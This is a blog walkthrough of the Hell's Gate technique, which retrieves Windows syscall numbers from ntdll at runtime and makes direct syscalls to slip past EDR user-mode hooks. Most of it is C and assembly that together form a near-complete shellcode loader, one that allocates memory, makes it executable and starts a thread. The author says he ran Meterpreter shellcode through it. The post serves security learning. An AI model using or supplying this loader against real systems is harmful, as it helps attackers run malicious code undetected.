Previous

Exploring Hell's Gate

TL;DR: To bypass user mode hooks implemented by Endpoint Detection and Response (EDR) systems, attackers (specifically red teams) employ various techniques for unhooking or bypassing these safeguards. The focus here is on the Hell's Gate Proof of Concept (POC), an approach that utilizes direct syscalls to bypass user mode hooks. Even though Hell's Gate POC has been around for a few years, it remains pivotal in the evolution of direct syscalls.

One key issue that Hell's Gate solves is the avoidance of hardcoded System Service Numbers (SSNs), also known as syscall IDs, in direct syscall POCs. Instead, it allows for the dynamic retrieval of SSNs from native functions within the ntdll.dll at runtime. This is crucial as SSNs can change between different versions of Windows, and in a realistic scenario or during a red team engagement, the target's specific Windows version is often unknown. Thus, hardcoding SSNs poses a risk and could lead to failure in the attack, a problem effectively addressed by the Hell's Gate technique.

Disclaimer

There is a great paper by Hell's Gate founders am0nsec and RtlMateusz. But as always, the best way for me to learn about a topic is to dig deep into it and make a presentation or write a blog post. I'm not making any claims, I'm just trying to understand Hell's Gate and share it with the infosec community. The Hell's Gate POC can be found here.

Introduction

To avoid user mode hooks from EDRs, an attacker (red team) can use several techniques to get rid of user mode hooks by unhooking or bypassing user mode hooks using direct or indirect syscalls. In this blog post I will focus on the Hell's Gate POC, which uses direct syscalls to bypass user mode hooks. Although the POC is a few years old, in my opinion it was one of the most important steps or POCs in the evolution of direct syscalls in the past. Also, I want to understand the code better, so reason enough to take a closer look at it.

In general, why was Hell's Gate introduced, or what problem does it solve? Instead of hardcoding System Service Numbers (SSN) or syscall IDs into a direct syscall POC, the Hell's Gate technique allows us to dynamically retrieve SSNs from native functions at runtime from ntdll.dll. But why do we need this? The reason is simple: SSNs can vary from Windows to Windows or version to version, and in a real-world scenario or red team engagement, we usually do not know what Windows or version the target is running. Therefore, hardcoding the SSNs could be risky and fail.

Dynamic retrieval of SSNs

Regardless of whether we use a direct or indirect syscall shellcode loader, if we do not want to hardcode the SSNs from the native functions we use in our loader, we need to find a way to dynamically retrieve the SSNs from ntdll.dll at runtime. To achieve this, we can use several different techniques, as shown in the following examples.

  • Using GetModuleHandleA and GetProcAddress
  • PEB walk combined with EAT parsing
  • Build your own GetModuleHandleA and GetProcAddress functions

I think the simplest technique in this case is to open a handle to ntdll.dll by using GetModuleHandleA to get the base address of ntdll.dll. Then use GetProcAddress to get the memory address of a native function in ntdll.dll, e.g. NtAllocateVirtualMemory. However, from an opsec perspective, this is not really recommended, because if GetModuleHandleA and/or GetProcAddress is hooked by the EDR, you will be caught. Therefore, among other things, we are going to take a closer look at how SSN retrieval is done in Hell's Gate by going through the PEB and the EAT parsing.

Hell's Gate in a nutshell

In short, based on various defined structures, functions etc., Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs. The main steps can be briefly described as follows.

  • The first step is to access to the Thread Environment Block (TEB)
  • From there, access the PEB
  • Go through the PEB and get the base address from ntdll.dll
  • Access the EAT from ntdll.dll
  • Use djb2 hashing on all native functions in the code
  • Hash the function names retrieved from EAT using the djb2 algorithm
  • Compare the hashed function names with the hashed entries in EAT
  • If they match, store the function address in VX_TABLE as VX_TABLE_ENTRY.
  • Based on the (absolut) function address, do an opcode comparison of the syscall stub from the native functions in ntdll.dll to check if the function is hooked or not.
  • Additionally, based on checking the opcodes for the syscall and return instruction, check if they are not too far apart to avoid executing a wrong native function or syscall.
  • Use the HellsGate function to prepare the execution of a direct syscall.
  • Use the HellDescent function to proceed the execution of a direct syscall

To get a better understanding of the Hell's Gate POC in detail, we will break it down and take a closer look at it. We will start by having a look at the manually defined structures.

Hell's Gate Structures

typedef struct _VX_TABLE_ENTRY {
	PVOID   pAddress;
	DWORD64 dwHash;
	WORD    wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;

Starting at the top of the code, we can identify two defined structures called _VX_TABLE_ENTRY and _VX_TABLE. The first structure _VX_TABLE_ENTRY contains three different data types and builds the template for the entries in the second structur or table_VX_TABLE.

  • pAddress holds the memory address of a native function e.g. NtAllocateVirtualMemory
  • dwHash stores the djb2 hash of a function e.g. NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b
  • wSystemCall holds the SSN of a native function e.g. NtAllocateVirtualMemory
typedef struct _VX_TABLE {
	VX_TABLE_ENTRY NtAllocateVirtualMemory;
	VX_TABLE_ENTRY NtProtectVirtualMemory;
	VX_TABLE_ENTRY NtCreateThreadEx;
	VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;

Based on _VX_TABLE_ENTRY, _VX_TABLE then holds pAddress, dwHash and wSystemCall for each entry in the table, and each entry represents one of four native functions used in Hell's Gate. The _VX_TABLE contains all the necessary data for the preparation and execution of the direct syscalls.

In short, these structures are used to store and organise the data that is later used in the code to execute direct syscalls. This way they can be easily looked up and accessed when they need to be called. The SSNs or syscalls are called directly, not through ntdll.dll, so their function addresses and SSNs need to be stored somewhere, which is what these structures are used for.

Hell's Gate Functions

In the next step, Hell's Gate defines different types of functions that will be used in the code. Let us take a closer look at each function.

RtlGetThreadEnvironmentBlock

PTEB RtlGetThreadEnvironmentBlock();

The RtlGetThreadEnvironmentBlock() function is used to get a pointer PTEB to the TEB of the current thread, it is a data structure that stores information about the state of the current thread. Later we will see that getting the address from the TEB is necessary to get the address from the PEB.

PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
	return (PTEB)__readgsqword(0x30);
#else
	return (PTEB)__readfsdword(0x16);
#endif
}

It checks the _WIN64 macro to determine if the code is being compiled for a 64-bit Windows platform. If it is, then the intrinsic function __readgsqword(0x30) is used to read a quadword (64 bits) from a specific offset (0x30) in the GS segment, which contains the TEB on 64-bit Windows. If the code is compiled for a 32-bit Windows platform (if _WIN64 is not defined), then the intrinsic function __readfsdword(0x16) is used instead to read a double word (32 bits) from a different offset (0x16) in the FS segment, which contains the TEB on 32-bit Windows. Both intrinsic functions return a pointer (PTEB) to the TEB which is returned by the RtlGetThreadEnvironmentBlock function.

GetImageExportDirectory

BOOL GetImageExportDirectory(
	_In_ PVOID                     pModuleBase,
	_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
);

The purpose of the GetImageExportDirectory function is to retrieve the _Image_Export_Directory of a given module. Later, when we look at the main function, we will see that the GetImageExportDirectory function is used to get the address of the _IMAGE_EXPORT_DIRECTORY of the ntdll.dll module.

BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
	// Get DOS header
	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return FALSE;
	}

	// Get NT headers
	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return FALSE;
	}

	// Get the EAT
	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
	return TRUE;
}

The GetImageExportDirectory function basically parses a module in memory to find and return a pointer to its export directory. This directory is crucial when the code needs to find a function exported by a DLL by name, as it contains all the exported function names and their corresponding relativ virtual addresses (RVA).

Specifically, the GetImageExportDirectory function does the following:

  • To read the structure of a PE file, we first need to get a pointer pImageDosHeader to the _IMAGE_DOS_HEADER. By checking the e_magic field we make sure that we are really reading a PE file, it's not equal to the expected value, the function will return FALSE, indicating that the PE file is invalid or the provided one.

  • Once we have the address to the _IMAGE_DOS_HEADER, we can access e_lfanew, which is a field in the DOS header that contains the file offset to the NT headers. Again, validation is implemented by checking that the _IMAGE_NT_HEADER starts with the Signature field.

  • Finally, access the Export Address Table (EAT), which is part of the _IMAGE_OPTIONAL_HEADER32 and can be accessed via the DataDirectory: The first entry in the DataDirectory (index 0) is the _IMAGE_EXPORT_DIRECTORY, which contains information about the functions from the module, in case of ntdll.dll e.g. NtAllocateVirtualMemory, NtProtectVirtualMemory etc.

Later we will see that the base address from ntdll.dll and the address from the _IMAGE_EXPORT_DIRECTORY in EAT are needed to access the following three entries in the _IMAGE_EXPORT_DIRECTORY:

  • AddressOfFunctions
  • AddressOfNames
  • AddressOfNamesOrdinales

These in turn are needed to finally get the (absolute) memory address of the native functions, e.g. NtAllocateVirtualMemory. But more on this later.

djb2 Hashing

DWORD64 djb2(PBYTE str) {
	DWORD64 dwHash = 0x7734773477347734;
	INT c;

	while (c = *str++)
		dwHash = ((dwHash << 0x5) + dwHash) + c;

	return dwHash;
}

The djb2 function calculates the djb2 hash for a given string. Why is this function needed? Later we will see that in the context of the GetVxTableEntry function, djb2 is used to hash the name of each function in the EAT. These hashes are then compared to the dwHash field of the pVxTableEntry structure.

GetVxTableEntry

BOOL GetVxTableEntry(
	_In_ PVOID pModuleBase,
	_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
	_In_ PVX_TABLE_ENTRY pVxTableEntry
);
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
			pVxTableEntry->pAddress = pFunctionAddress;

			// Quick and dirty fix in case the function has been hooked
			WORD cw = 0;
			while (TRUE) {
				// check if syscall, in this case we are too far
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
					return FALSE;

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
					return FALSE;

				// First opcodes should be :
				//    MOV R10, RCX
				//    MOV RCX, <syscall>
				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					pVxTableEntry->wSystemCall = (high << 8) | low;
					break;
				}

				cw++;
			};
		}
	}

	return TRUE;
}

In short, based on the base address from ntdll.dll and the _IMAGE_EXPORT_DIRECTORY, the GetVxTableEntry function is responsible for calculating the absolute memory address of a native function in memory in ntdll.dll. It is also responsible for checking, based on an opcode comparison or validation, whether the native function is hooked or not. If it is not hooked, it retrieves the SSN and stores it in the appropriate VX_TABLE_ENTRY in the wSystemCall variable. But to better understand this function, let us break it down.

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
			pVxTableEntry->pAddress = pFunctionAddress;

In the first part, GetVxTableEntry creates pointers to the AddressOfFunctionsAddressOfNames and AddressOfNameOrdinals arrays in the _IMAGE_EXPORT_DIRECTORY. These arrays contain the relative virtual address (RVA) of a function, the function name and the function ordinal respectively.

It then iterates through all the function names in the AddressOfNames array. For each name, it calculates the djb2 hash and compares it to the hash passed in the VX_TABLE_ENTRY structure. If the hashes match, it means that the function has been found. The absolut address of the function is then calculated by adding the base address from ntdll.dll to the RVA from the function. Then the absolute address is stored in the pFunctionAddress variable or in the VX_TABLE_ENTRY structure within the pAddress variable.

// Quick and dirty fix in case the function has been hooked
			WORD cw = 0;
			while (TRUE) {
				// check if syscall, in this case we are too far
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
					return FALSE;

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
					return FALSE;

				// First opcodes should be :
				//    MOV R10, RCX
				//    MOV RCX, <syscall>
				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					pVxTableEntry->wSystemCall = (high << 8) | low;
					break;
				}

In the second part of the GetVxTableEntry function, Hell's Gate uses the address of a native function to look for that function in the memory of ntdll.dll. It then looks for bytes 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00 from the native function's syscall stub and compares them to certain values in the code. It starts at 0x4c from the native function and compares byte by byte in the opcode sequence until it reaches the second null byte.


If we look at the figure above, we can see that these values represent the opcode or bytes from an unhooked or clean syscall stub from a native function. If the comparison is correct or the native function is not hooked, the SSN will be extracted and stored in the corresponding VxTableEntry in _VX_TABLE in the form of the wSystemCall variable. This procedure is done for all four functions in _VX_TABLE.

// check if syscall, in this case we are too far
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
					return FALSE;

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
					return FALSE;


In an effort to avoid accidentally finding the wrong System Service Number (SSN) for another system call, the code uses two if statements at the start of the loop. These statements check for the syscall and ret instructions that mark the end of a system call. If the loop encounters these end-of-call instructions without finding the opcode sequence 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00 it means that the correct SSN wasn't found and extracting the correct SSN will fail. This helps to keep the search accurate and in context.

BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					pVxTableEntry->wSystemCall = (high << 8) | low


To finally extract the SSN from the syscall stub, the code reads the 5th and 4th bytes starting from 0x4c. First the high byte (most significant byte (5th)) of the syscall ID is extracted, then the low byte (least significant byte (4th)). These two bytes are then combined to form the complete syscall ID.

While the data is stored in memory in little-endian format (low byte at the lower address and high byte at the higher address), the code reads the high byte first and the low byte second. However, it then correctly shifts the high byte 8 places to the left (high << 8) and combines it with the low byte to construct the correct 16-bit syscall ID, respecting the little-endian format.

Payload

BOOL Payload(
	_In_ PVX_TABLE pVxTable
);
BOOL Payload(PVX_TABLE pVxTable) {
	NTSTATUS status = 0x00000000;
	char shellcode[] = "\xfc\x48\x83";

	// Allocate memory for the shellcode
	PVOID lpAddress = NULL;
	SIZE_T sDataSize = sizeof(shellcode);
	HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
	status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);

	// Write Memory
	VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));

	// Change page permissions
	ULONG ulOldProtect = 0;
	HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
	status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);

	// Create thread
	HANDLE hHostThread = INVALID_HANDLE_VALUE;
	HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
	status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

	// Wait for 1 seconds
	/*LARGE_INTEGER Timeout;
	Timeout.QuadPart = -10000000;*/
	HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
	status = HellDescent(hHostThread, FALSE, NULL);

	return TRUE;
}

The payload function is nothing special, based on the external functions HellsGate and HellsDescent, it is simply responsible for executing the direct syscalls to allocate virtual memory, copy the shellcode into memory, execute it etc. In the context of running meterpreter shellcode, I was able to observe that it was necessary to comment out the timeout code part within the NtWaitForSingleObject. Otherwise the execution of the meterpreter shellcode failed.

VxMoveMemory

PVOID VxMoveMemory(
	_Inout_ PVOID dest,
	_In_    const PVOID src,
	_In_    SIZE_T len
);

The purpose of the VxMoveMemory function is to copy a block of memory from one location (src) to another (dest). It is similar in purpose to the memcpy function in the standard C library, but has a custom implementation for this code. The function is used to copy the shellcode into memory. In my opinion, this function is not essential and could be replaced by memcpy or the native NtWriteVirtualMemory function.

extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();
; Hell's Gate
; Dynamic system call invocation 
; 
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)

.data
	wSystemCall DWORD 000h

.code 
	HellsGate PROC
		mov wSystemCall, 000h
		mov wSystemCall, ecx
		ret
	HellsGate ENDP

	HellDescent PROC
		mov r10, rcx
		mov eax, wSystemCall

		syscall
		ret
	HellDescent ENDP
end

In addition, Hell's Gate defines two external functions called HellsGate and HellDescent, which will be used to prepare and execute direct system calls.

The first procedure, HellsGate, takes an argument (the system call number) in the ecx register. The instruction mov wSystemCall, 000h initialises the variable wSystemCall to zero, but the next instruction mov wSystemCall, ecx immediately overwrites it with the value in ecx. This procedure is used to store the system call number in the global variable wSystemCall for later use.

The second procedure, HellDescent, actually executes the system call. The syscall instruction in x64 Windows expects the system call number to be in the eax register and the parameters to the system call to be in rcx, rdx, r8 and r9. This procedure first moves the contents of rcx to r10 because the syscall instruction will overwrite the rcx register, and then loads the system call number (SSN) from wSystemCall into eax. Subsequently the syscall instruction is used to execute the syscall.

Hell's Gate Main Function

INT wmain() {
	PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
	PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
	if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
		return 0x1;

	// Get NTDLL module 
	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);

	// Get the EAT of NTDLL
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
		return 0x01;

	VX_TABLE Table = { 0 };
	Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
		return 0x1;

	Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
		return 0x1;

	Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
		return 0x1;

	Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
		return 0x1;

	Payload(&Table);
	return 0x00;
}

Last but not least, let us have a look at the main function and try to understand how it all fits together. Therefore we want to break down the main function in Hell's Gate.

PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();

To get the base address from ntdll.dll without using the GetModuleHandleA API, we need to go through the PEB, but first we need to declare a pointer pCurrentPeb to the TEB structure from the current process.

PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;

Next, the pointer pCurrentPeb is declared, pointing to the PEB. Based on the pointer pCurrentTeb pointing to the TEB, the PEB structure can be accessed using the -> operator.

if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
		return 0x1;

In addition, Hell's Gate checks that the PEB and TEB have been successfully retrieved and that the major version of the operating system is 10. This means Hell's Gate expects to be running on Windows 10 (since the main version number for Windows 10 is 10, or 0xA in hex). If it's running on a different version of Windows, the function will exit immediately with a return code of 0x1.

// Get NTDLL module 
	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);

With the next line of code, Hell's Gate gets a pointer PLDR_DATA_TABLE_ENTRY to the LDR_DATA_TABLE_ENTRY structure and holds the address of the second entry ntdll.dll within LDR_DATA_TABLE_ENTRY in the variable pLdrDataEntry. In my opinion this line of code is very important to understand the concept of going through PEB (PEB walk) to get the base address of a module, lets break down this line of code to get a better understanding. I will chunk the line of code and explain it step by step.

pCurrentPeb->LoaderData

This accesses the LoaderData member of the PEB structure. The LoaderData member points to a PEB_LDR_DATA structure which contains information about the modules (DLLs) that have been loaded into the process.

pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink

The InMemoryOrderModuleList member is a double-linked list containing LDR_DATA_TABLE_ENTRY structures for each module, sorted in the order they were loaded into memory. The Flink member is a pointer to the next entry in the linked list. In this case it's pointing to the entry for the main executable module of the process.

Additional information: A double linked list is a type of linked list in which each node contains a reference to both the next node and the previous node in the sequence.

pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink

By following the Flink member twice we now point to the second entry in the InMemoryOrderModuleList, which is usually the ntdll.dll module.

(PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10

This does pointer arithmetic to subtract 0x10 (16 in decimal) from the address of the ntdll.dll entry in the InMemoryOrderModuleList. This step is necessary because the InMemoryOrderModuleList is part of a larger structure (LDR_DATA_TABLE_ENTRY) and Flink is not the first member of that structure. So subtracting 0x10 gives us the start of the LDR_DATA_TABLE_ENTRY structure for ntdll.dll.

(PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)

Here we'll cast the resulting address to a PLDR_DATA_TABLE_ENTRY pointer. This gives us a pointer to the LDR_DATA_TABLE_ENTRY structure for ntdll.dll.

PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)

Finally, we store this pointer in the pLdrDataEntry variable. After this line of code, pLdrDataEntry points to the LDR_DATA_TABLE_ENTRY structure for ntdll.dll. Based on this, we can access the base address of ntdll.dll in the next line of code.

// Get the EAT of NTDLL
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
		return 0x01;

Now, we call the GetImageExportDirectory function to access the EAT from ntdll.dll.

VX_TABLE Table = { 0 };
	Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
		return 0x1;

First, the initialisation { 0 } sets all members of the VX_TABLE structure to zero. Representative for the other functions, the variable dwHash for the VX_TABLE entry NtAllocateVirtualMemory is set to the corresponding djb2 hash. Next, the GetVxTableEntry function is called. Remember that this function is used to get the absolute address of the corresponding function (in this case for NtAllocateVirtualMemory) in the ntdll.dll memory. The GetVxTableEntry function is also responsible for doing the opcode comparison, extracting the SSN of the native function and storing it in the variable wSystemCall as long as the comparison was successful or the native function is not hooked. Then the Payload function is executed, which uses the externally declared HellsGate and HellDescent functions to execute the direct syscalls to allocate virtual memory, copy shellcode, etc.

Summary

In this blog post we took a closer look at the Hell's Gate code and saw how Hell's Gate exploits the execution of direct syscalls by dynamically retrieving the SSNs from ntdll.dll without using the GetModuleHandleA and GetProcAddress APIs. In general, the opcode comparison to extract the SSNs from ntdll.dll can still be used, but it is not recommended because if the EDR hooks any or all of the native functions used in the POC, Hell's Gate would fail. Therefore, Sektor7 created an evolution of Hell's Gate, which is called Halos Gate. In comparison to Hell's Gate, Halos Gate can also be used to dynamically retrieve SSNs from ntdll.dll, even if the function is hooked by an EDR. In addition, the POC Tartarus Gate uses the same concept as Halos Gate.

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 04.11.23 18:44:07 04.11.23
Daniel Feichter